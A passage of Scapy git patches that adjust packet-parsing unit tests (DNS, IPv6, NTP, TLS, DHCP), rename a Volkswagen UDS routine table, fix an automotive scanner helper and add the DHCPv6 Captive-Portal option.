Vob3\xaf+\xec\x02\xbb\x82x\x83\xb1"\xa2\xc1\xac\x06\x9b\xc9\xb0"\x0b3\xccdV\x93\xa0\x0f^\xfc\xc2w^\x16U\x88\x8a\xd5n\xdf\xb6\xdd0\n\xf5q\xb1\t!M&Y>K\xae\xf9\xacw\t\x83\xe8V\xaf\x0f\xa7m\xdaV\xf78z\xad\x1f\xbf\x95=5\xd9\x071\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x0f\xe94\xdf\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xff\x15\x85\xe18.\xcbrZ\xce\x1f5u\n\xd1') + +# measure the time it takes +old_max_list_count = conf.max_list_count +conf.max_list_count = 10 +import time +t = time.monotonic() + +with no_debug_dissector(): + try: + dns = Ether(data) + except MaximumItemsCount: + pass + +delta = time.monotonic() - t +assert delta < 10 + +conf.max_list_count = old_max_list_count -# RR type A -dnsrr1 = Raw(b'\x01a\x01b\x01c\x00\x00\x01\x10\x00\x00\x00\x00\x01\x00\x04\x01\x02\x03\x04') -# RR type NS & plain rdata -dnsrr2 = Raw(b'\x02ns\xc0\x0e\x00\x02\x10\x00\x00\x00\x00\x01\x00\x06\x01x\x01y\x01z') -# RR type NS & compressed rdata -dnsrr3 = Raw(b'\x02ns\xc0\x0e\x00\x02\x10\x00\x00\x00\x00\x01\x00\x07\x04test\xc0\x0e') += DNS - Backward compatibility: keep deprecated behavior +~ dns + +# Get through a list (should be pkt.an[0].rdata) +c = b'\x01\x00^\x00\x00\xfb\x14\x0cv\x8f\xfe(\x08\x00E\x00\x01C\xe3\x91@\x00\xff\x11\xf4u\xc0\xa8\x00\xfe\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01/L \x00\x00\x84\x00\x00\x00\x00\x04\x00\x00\x00\x00\x05_raop\x04_tcp\x05local\x00\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x1e\x1b140C768FFE28@Freebox Server\xc0\x0c\xc0(\x00\x10\x80\x01\x00\x00\x11\x94\x00\xa0\ttxtvers=1\x08vs=190.9\x04ch=2\x08sr=44100\x05ss=16\x08pw=false\x06et=0,1\x04ek=1\ntp=TCP,UDP\x13am=FreeboxServer1,2\ncn=0,1,2,3\x06md=0,2\x07sf=0x44\x0bft=0xBF0A00\x08sv=false\x07da=true\x08vn=65537\x04vv=2\xc0(\x00!\x80\x01\x00\x00\x00x\x00\x19\x00\x00\x00\x00\x13\x88\x10Freebox-Server-3\xc0\x17\xc1\x04\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xfe' +pkt = Ether(c) +assert pkt.an.rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' -d = DNS(raw(DNS(ancount=3, an=dnsrr1/dnsrr2/dnsrr3))) -assert d.an[0].rdlen == 4 and d.an[1].rdlen == 6 and d.an[2].rdlen is None +# Set qd to None (should be qd=[]) +pkt = DNS(qr=1, qd=None, aa=1, rd=1) +pkt = DNS(bytes(pkt)) +assert pkt.qd == [] \ No newline at end of file diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index a4e294e017b..c9860f3b8f4 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -178,8 +178,8 @@ assert pkt[Dot11EltCountry].pad == 0 assert pkt.getlayer(Dot11Elt, ID=11) * Country element: Secondary padding check -erp_payload = b'\x1e\x2a\x01\x62' -country_payload = b'\x07\x06\x55\x53\x20\x01\x0b' +erp_payload = b'\x2a\x01\x62' +country_payload = b'\x07\x06\x55\x53\x20\x01\x0b\x1e' bare_country = Dot11EltCountry(country_payload) country_nested = Dot11EltCountry(country_payload + erp_payload) diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index e1131e95dbd..e16c769e4bc 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -421,6 +421,9 @@ pkt = IP(len=28, ihl=5) / UDP() bpkt = IP(raw(pkt)) assert bpkt.chksum == 0x7cce and bpkt.payload.chksum == 0x0172 +* Invalid territory +conf.debug_dissector = False + pkt = IP() / UDP() / ("A" * 10) bpkt = IP(raw(pkt)) assert bpkt.chksum == 0x7cc4 and bpkt.payload.chksum == 0xbb17 @@ -445,6 +448,8 @@ pkt = IP(len=42, ihl=6, options=[IPOption_RR()]) / UDP() / ("A" * 10) bpkt = IP(raw(pkt)) assert bpkt.chksum == 0x70bd and bpkt.payload.chksum == 0xbb17 +conf.debug_dissector = True + = IP with forced-length 0 p = IP()/TCP() p[IP].len = 0 @@ -495,7 +500,9 @@ value == 26908070 test.i2repr("", value) == '7:28:28.70' = IPv4 - UDP null checksum +conf.debug_dissector = False IP(raw(IP()/UDP()/Raw(b"\xff\xff\x01\x6a")))[UDP].chksum == 0xFFFF +conf.debug_dissector = True = IPv4 - (IP|UDP|TCP|ICMP)Error query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/UDP()/DNS() diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index d140b653779..4bc7e4573d3 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -26,7 +26,9 @@ a.nh == 6 and a.plen == 20 and isinstance(a.payload, TCP) and a.payload.chksum = raw(IPv6()/TCP()/Raw(load="somedata")) == b'`\x00\x00\x00\x00\x1c\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xd5\xdd\x00\x00somedata' = IPv6 Class with TCP and TCP data - dissection -a=IPv6(raw(IPv6()/TCP(dport=1234, sport=1234)/Raw(load="somedata"))) +with no_debug_dissector(): + a=IPv6(raw(IPv6()/TCP(dport=1234, sport=1234)/Raw(load="somedata"))) + a.nh == 6 and a.plen == 28 and isinstance(a.payload, TCP) and a.payload.chksum == 0xcc9d and isinstance(a.payload.payload, Raw) and a[Raw].load == b"somedata" = IPv6 Class binding with Ethernet - build @@ -56,8 +58,9 @@ p = PseudoIPv6(src="fd00::abcd", dst="fd00::1234", uplen=64, nh=socket.IPPROTO_U raw(p) == b"\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xab\xcd\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x34\x00\x00\x00\x40\x00\x00\x00\x11" = in6_chksum is computed on UDP or TCP build -p = IPv6(raw(IPv6()/UDP()/Raw(load="somedata"))) -assert p.chksum == 0x45cb +with no_debug_dissector(): + p = IPv6(raw(IPv6()/UDP()/Raw(load="somedata"))) + assert p.chksum == 0x45cb ########### IPv6ExtHdrRouting Class ########################### @@ -874,12 +877,16 @@ assert a.pkt == b"" = ICMPv6NDOptRedirectedHdr - Disssection with specific values ~ ICMPv6NDOptRedirectedHdr -a=ICMPv6NDOptRedirectedHdr(b'\x04\xff\x11\x11\x00\x00\x00\x00somerawingthatisnotanipv6pac') +with no_debug_dissector(): + a=ICMPv6NDOptRedirectedHdr(b'\x04\xff\x11\x11\x00\x00\x00\x00somerawingthatisnotanipv6pac') + a.type == 4 and a.len == 255 and a.res == b'\x11\x11\x00\x00\x00\x00' and isinstance(a.pkt, Raw) and a.pkt.load == b"somerawingthatisnotanipv6pac" = ICMPv6NDOptRedirectedHdr - Dissection with cut IPv6 Header ~ ICMPv6NDOptRedirectedHdr -a=ICMPv6NDOptRedirectedHdr(b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +with no_debug_dissector(): + a=ICMPv6NDOptRedirectedHdr(b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') + a.type == 4 and a.len == 6 and a.res == b"\x00\x00\x00\x00\x00\x00" and isinstance(a.pkt, Raw) and a.pkt.load == b'`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' = ICMPv6NDOptRedirectedHdr - Complete dissection @@ -993,9 +1000,9 @@ a=ICMPv6NDOptSrcAddrList(b'\t\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\ a.type == 9 and a.len == 5 and a.res == b'BBBBBB' and len(a.addrlist) == 2 and a.addrlist[0] == "ffff::ffff" and a.addrlist[1] == "1111::1111" = ICMPv6NDOptSrcAddrList - Dissection with specific values -conf.debug_dissector = False -a=ICMPv6NDOptSrcAddrList(b'\t\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -conf.debug_dissector = True +with no_debug_dissector(): + a=ICMPv6NDOptSrcAddrList(b'\t\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') + a.type == 9 and a.len == 3 and a.res == b'BBBBBB' and len(a.addrlist) == 1 and a.addrlist[0] == "ffff::ffff" and isinstance(a.payload, Raw) and a.payload.load == b'\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' @@ -1021,9 +1028,9 @@ a=ICMPv6NDOptTgtAddrList(b'\n\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\ a.type == 10 and a.len == 5 and a.res == b'BBBBBB' and len(a.addrlist) == 2 and a.addrlist[0] == "ffff::ffff" and a.addrlist[1] == "1111::1111" = ICMPv6NDOptTgtAddrList - Instantiation with specific values -conf.debug_dissector = False -a=ICMPv6NDOptTgtAddrList(b'\n\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -conf.debug_dissector = True +with no_debug_dissector(): + a=ICMPv6NDOptTgtAddrList(b'\n\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') + a.type == 10 and a.len == 3 and a.res == b'BBBBBB' and len(a.addrlist) == 1 and a.addrlist[0] == "ffff::ffff" and isinstance(a.payload, Raw) and a.payload.load == b'\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' @@ -1694,7 +1701,7 @@ raw(ICMPv6NIReplyRefuse())[:8] == b'\x8c\x01\x00\x00\x00\x00\x00\x00' = ICMPv6NIReplyRefuse - basic dissection a=ICMPv6NIReplyRefuse(b'\x8c\x01\x00\x00\x00\x00\x00\x00\xf1\xe9\xab\xc9\x8c\x0by\x18') -a.type == 140 and a.code == 1 and a.cksum == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b'\xf1\xe9\xab\xc9\x8c\x0by\x18' and a.data == None +a.type == 140 and a.code == 1 and a.cksum == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b'\xf1\xe9\xab\xc9\x8c\x0by\x18' and a.data == b"" ############ @@ -1706,7 +1713,7 @@ raw(ICMPv6NIReplyUnknown(nonce=b'\x00'*8)) == b'\x8c\x02\x00\x00\x00\x00\x00\x00 = ICMPv6NIReplyRefuse - basic dissection a=ICMPv6NIReplyRefuse(b'\x8c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 140 and a.code == 2 and a.cksum == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b'\x00'*8 and a.data == None +a.type == 140 and a.code == 2 and a.cksum == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b'\x00'*8 and a.data == b"" ############ diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index 0f9f58a5c9d..eddac823816 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -129,7 +129,7 @@ assert p.status == 0 assert p.association_id == 0 assert p.offset == 0 assert p.count == 0 -assert p.data == b'' +assert p.data is None = NTP Control (mode 6) - CTL_OP_READSTAT (2) - response @@ -175,7 +175,7 @@ assert p.op_code == 2 assert p.sequence == 18 assert p.status == 0 assert p.association_id == 64655 -assert p.data == b'' +assert p.data is None = NTP Control (mode 6) - CTL_OP_READVAR (2) - response (1st packet) @@ -246,7 +246,7 @@ assert p.response == 1 assert p.err == 1 assert p.more == 0 assert p.op_code == 2 -assert len(p.data.load) == 0 +assert not p.data assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'97280249dba07338ed722860db4a580a' @@ -279,7 +279,7 @@ assert p.op_code == 3 assert hasattr(p, 'status_word') assert isinstance(p.status_word, NTPErrorStatusPacket) assert p.status_word.error_code == 5 -assert len(p.data.load) == 0 +assert not p.data assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'807a80fbafc470679853a8e57865811c' @@ -358,8 +358,8 @@ assert p.response == 0 assert p.err == 0 assert p.more == 0 assert p.op_code == 12 -assert p.data == b'' -assert p.authenticator == b'' +assert p.data is None +assert not p.authenticator = NTP Control (mode 6) - CTL_OP_REQ_NONCE (2) - response @@ -373,7 +373,7 @@ assert p.err == 0 assert p.more == 0 assert p.op_code == 12 assert p.data.load == b'nonce=db4186a2e1d9022472e24bc9\r\n' -assert p.authenticator == b'' +assert not p.authenticator = NTP Control (mode 6) - CTL_OP_READ_MRU (1) - request @@ -387,7 +387,7 @@ assert p.err == 0 assert p.op_code == 10 assert p.count == 40 assert p.data.load == b'nonce=db4186a2e1d9022472e24bc9, frags=32' -assert p.authenticator == b'' +assert not p.authenticator = NTP Control (mode 6) - CTL_OP_READ_MRU (2) - response s = b'\xd6\x8a\x00\x08\x00\x00\x00\x00\x00\x00\x00\xe9nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00' @@ -400,7 +400,7 @@ assert p.err == 0 assert p.op_code == 10 assert p.count == 233 assert p.data.load == b'nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00' -assert p.authenticator == b'' +assert not p.authenticator ############ diff --git a/test/tls.uts b/test/tls.uts index 474db2b3a1f..72bca4b8084 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1522,7 +1522,7 @@ assert r2.tls_session.tls_version == 0x303 pkt = TLSServerHello(b"\x02\x00\x00\x28\x03\x03ABCDEFGHIJKLMNOPQRSTUVWXYZ012345\x00\x00\x39\x00\x00\x00") assert pkt.extlen == 0 -assert pkt.ext is None +assert pkt.ext == [] = Issue 3324 - FFDH support diff --git a/test/tls13.uts b/test/tls13.uts index 750ce979a67..c046048ed1c 100644 --- a/test/tls13.uts +++ b/test/tls13.uts @@ -1212,3 +1212,10 @@ assert ch.len == 103 assert ch.client_shares[0].kxlen == 97 assert len(ch.client_shares[0].key_exchange) == 97 += Parse TLS 1.3 Client Hello with non-rfc 5077 ticket + +ch = TLS(b'\x16\x03\x01\x01\x1a\x01\x00\x01\x16\x03\x03\xec\x9c>\xb2\x9e|B\x05\x17f\x86\xc8\x18\x0421\x87\x87\x12\xf6\xec\xa2J\x95\x84[\xf8\xab\xe9gK> \xc6%\xff&wn)\xb2\xf5\xe8_x\x96\xe9\nEsK\xda\x86o\x82f\xa5\xbadk\xf4Ar~}\x00\x08\x13\x02\x13\x03\x13\x01\x00\xff\x01\x00\x00\xc5\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x00\x16\x00\x14\x00\x1d\x00\x17\x00\x1e\x00\x19\x00\x18\x01\x00\x01\x01\x01\x02\x01\x03\x01\x04\x00#\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\r\x00\x1e\x00\x1c\x04\x03\x05\x03\x06\x03\x08\x07\x08\x08\x08\t\x08\n\x08\x0b\x08\x04\x08\x05\x08\x06\x04\x01\x05\x01\x06\x01\x00+\x00\x03\x02\x03\x04\x00-\x00\x02\x01\x01\x003\x00&\x00$\x00\x1d\x00 l\x19\xe1f1 )6\xbf\x91\x9e\xab\xd2\x06\x16\x0b|\x88\xf7,\xf1\x88\x99Z\xb6\xb3\x93\xe4\x08z\x8a\t\x00)\x00:\x00\x15\x00\x0fClient_identity\x00\x00\x00\x00\x00! m\xf3^\xc1l\xac5\xf2\xe3=\xeb\xe3\x81\xd3\xb3\xdd\xbd\xbd\x01\xc9\xdd\x01i\x8c1\xa0ye\xcd\x04\x9e\x9c') + +assert isinstance(ch.msg[0].ext[9], TLS_Ext_PreSharedKey_CH) +assert ch.msg[0].ext[9].identities[0].identity.load == b'Client_identity' +assert ch.msg[0].ext[9].identities[0].obfuscated_ticket_age == 0 From cdbdb150ce69dc10debc1d659e5303d13b15f7fa Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 27 Jun 2023 23:05:07 +0200 Subject: [PATCH 1047/1632] Update definitions.py (#4046) Co-authored-by: superuserx --- .../automotive/volkswagen/definitions.py | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/scapy/contrib/automotive/volkswagen/definitions.py b/scapy/contrib/automotive/volkswagen/definitions.py index f9b09dacf6b..17854a98289 100644 --- a/scapy/contrib/automotive/volkswagen/definitions.py +++ b/scapy/contrib/automotive/volkswagen/definitions.py @@ -3155,16 +3155,16 @@ UDS_RDBI.dataIdentifiers[0xf1df] = "ECU Programming Information" -UDS_RC.routineControlTypes[0x0202] = "Check Memory" -UDS_RC.routineControlTypes[0x0203] = "Check Programming Preconditions" -UDS_RC.routineControlTypes[0x0317] = "Reset of Adaption Values" -UDS_RC.routineControlTypes[0x0366] = "Reset of all Adaptions" -UDS_RC.routineControlTypes[0x03e7] = "Reset to Factory Settings" -UDS_RC.routineControlTypes[0x045a] = "Clear user defined DTC information" -UDS_RC.routineControlTypes[0x0544] = "Verify partial software checksum" -UDS_RC.routineControlTypes[0x0594] = "Check upload preconditions" -UDS_RC.routineControlTypes[0xff00] = "Erase Memory" -UDS_RC.routineControlTypes[0xff01] = "Check Programming Dependencies" +UDS_RC.routineControlIdentifiers[0x0202] = "Check Memory" +UDS_RC.routineControlIdentifiers[0x0203] = "Check Programming Preconditions" +UDS_RC.routineControlIdentifiers[0x0317] = "Reset of Adaption Values" +UDS_RC.routineControlIdentifiers[0x0366] = "Reset of all Adaptions" +UDS_RC.routineControlIdentifiers[0x03e7] = "Reset to Factory Settings" +UDS_RC.routineControlIdentifiers[0x045a] = "Clear user defined DTC information" +UDS_RC.routineControlIdentifiers[0x0544] = "Verify partial software checksum" +UDS_RC.routineControlIdentifiers[0x0594] = "Check upload preconditions" +UDS_RC.routineControlIdentifiers[0xff00] = "Erase Memory" +UDS_RC.routineControlIdentifiers[0xff01] = "Check Programming Dependencies" UDS_RD.dataFormatIdentifiers[0x0000] = "Uncompressed" From 99db114bf7087447ab8c9b1fd5e1f92d17f88884 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 7 Jul 2023 22:12:39 +0200 Subject: [PATCH 1048/1632] Fix issue in Automotive Executor using make_lined_table (#4045) * Fix issue in Automotive Executor using make_lined_table * add unit test --- scapy/contrib/automotive/scanner/executor.py | 2 +- test/contrib/automotive/scanner/uds_scanner.uts | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index eeec5bd3745..196a88b6002 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -413,7 +413,7 @@ def show_testcases_status(self): for t in self.configuration.test_cases: for s in self.state_graph.nodes: data += [(repr(s), t.__class__.__name__, t.has_completed(s))] - make_lined_table(data, lambda tup: (tup[0], tup[1], tup[2])) + make_lined_table(data, lambda *tup: (tup[0], tup[1], tup[2])) @property def supported_responses(self): diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 7c72325ba19..8dc67970ae0 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -196,6 +196,7 @@ scanner = executeScannerInVirtualEnvironment( "request_length": 1}) scanner.show_testcases() +scanner.show_testcases_status() assert len(scanner.state_paths) == 5 assert scanner.scan_completed assert scanner.progress() > 0.95 From f37c4021eb191b2cf95693dc308a06d2bfb17717 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 8 Jul 2023 00:17:27 +0300 Subject: [PATCH 1049/1632] [dhcp6] add Captive-Portal option (#4050) * [dhcp] rename default-url to captive-portal According to https://datatracker.ietf.org/doc/html/rfc8910#section-4.2 IANA has updated the "BOOTP Vendor Extensions and DHCP Options" registry (https://www.iana.org/assignments/bootp-dhcp-parameters) as follows: Tag: 114 Name: DHCP Captive-Portal Data Length: N Meaning: DHCP Captive-Portal Reference: RFC 8910 * [dhcp6] add Captive-Portal option https://datatracker.ietf.org/doc/html/rfc8910#section-2.2 The format of the IPv6 Captive-Portal DHCP option is shown below. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | option-code | option-len | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ . URI (variable length) . | ... | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ option-code: The Captive-Portal DHCPv6 Option (103) (two octets). option-len: The unsigned 16-bit length, in octets, of the URI. URI: The URI for the captive portal API endpoint to which the user should connect. --- scapy/layers/dhcp.py | 2 +- scapy/layers/dhcp6.py | 10 ++++++++++ test/scapy/layers/dhcp.uts | 5 +++-- test/scapy/layers/dhcp6.uts | 17 +++++++++++++++++ 4 files changed, 31 insertions(+), 3 deletions(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index b3a03596455..0e1aef72679 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -320,7 +320,7 @@ def randval(self): 101: StrField("tcode", ""), 112: IPField("netinfo-server-address", "0.0.0.0"), 113: StrField("netinfo-server-tag", ""), - 114: StrField("default-url", ""), + 114: StrField("captive-portal", ""), 116: ByteField("auto-config", 0), 117: ShortField("name-service-search", 0,), 118: IPField("subnet-selection", "0.0.0.0"), diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index a1109efae88..776d2113c13 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -124,6 +124,7 @@ def _dhcp6_dispatcher(x, *args, **kargs): 66: "OPTION_RELAY_SUPPLIED_OPTIONS", # RFC6422 68: "OPTION_VSS", # RFC6607 79: "OPTION_CLIENT_LINKLAYER_ADDR", # RFC6939 + 103: "OPTION_CAPTIVE_PORTAL", # RFC8910 112: "OPTION_MUD_URL", # RFC8520 } @@ -181,6 +182,7 @@ def _dhcp6_dispatcher(x, *args, **kargs): 66: "DHCP6OptRelaySuppliedOpt", # RFC6422 68: "DHCP6OptVSS", # RFC6607 79: "DHCP6OptClientLinkLayerAddr", # RFC6939 + 103: "DHCP6OptCaptivePortal", # RFC8910 112: "DHCP6OptMudUrl", # RFC8520 } @@ -1026,6 +1028,14 @@ class DHCP6OptClientLinkLayerAddr(_DHCP6OptGuessPayload): # RFC6939 _LLAddrField("clladdr", ETHER_ANY)] +class DHCP6OptCaptivePortal(_DHCP6OptGuessPayload): # RFC8910 + name = "DHCP6 Option - Captive-Portal" + fields_desc = [ShortEnumField("optcode", 103, dhcp6opts), + FieldLenField("optlen", None, length_of="URI"), + StrLenField("URI", "", + length_from=lambda pkt: pkt.optlen)] + + class DHCP6OptMudUrl(_DHCP6OptGuessPayload): # RFC8520 name = "DHCP6 Option - MUD URL" fields_desc = [ShortEnumField("optcode", 112, dhcp6opts), diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index a6defec10b1..8abac11f540 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -44,8 +44,8 @@ s3 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="05:04:03:02:01:00")/DHCP(option ("ieee802-3-encapsulation", 2),("max_dgram_reass_size", 120), ("pxelinux_path_prefix","/some/path"), "end"])) assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)\x04i\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0005:04:03:02:01:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\x02\x04\x00\x00\x00{b\x0fwww.example.comp\x04\n\x00\x00\x01$\x01\x02\x16\x02\x00x\xd2\n/some/path\xff' -s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), "end"])) -assert s4 == b'E\x00\x01"\x00\x01\x00\x00@\x11{\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0e\tr\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.org\xff' +s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), ("captive-portal", "https://example.com"), "end"])) +assert s4 == 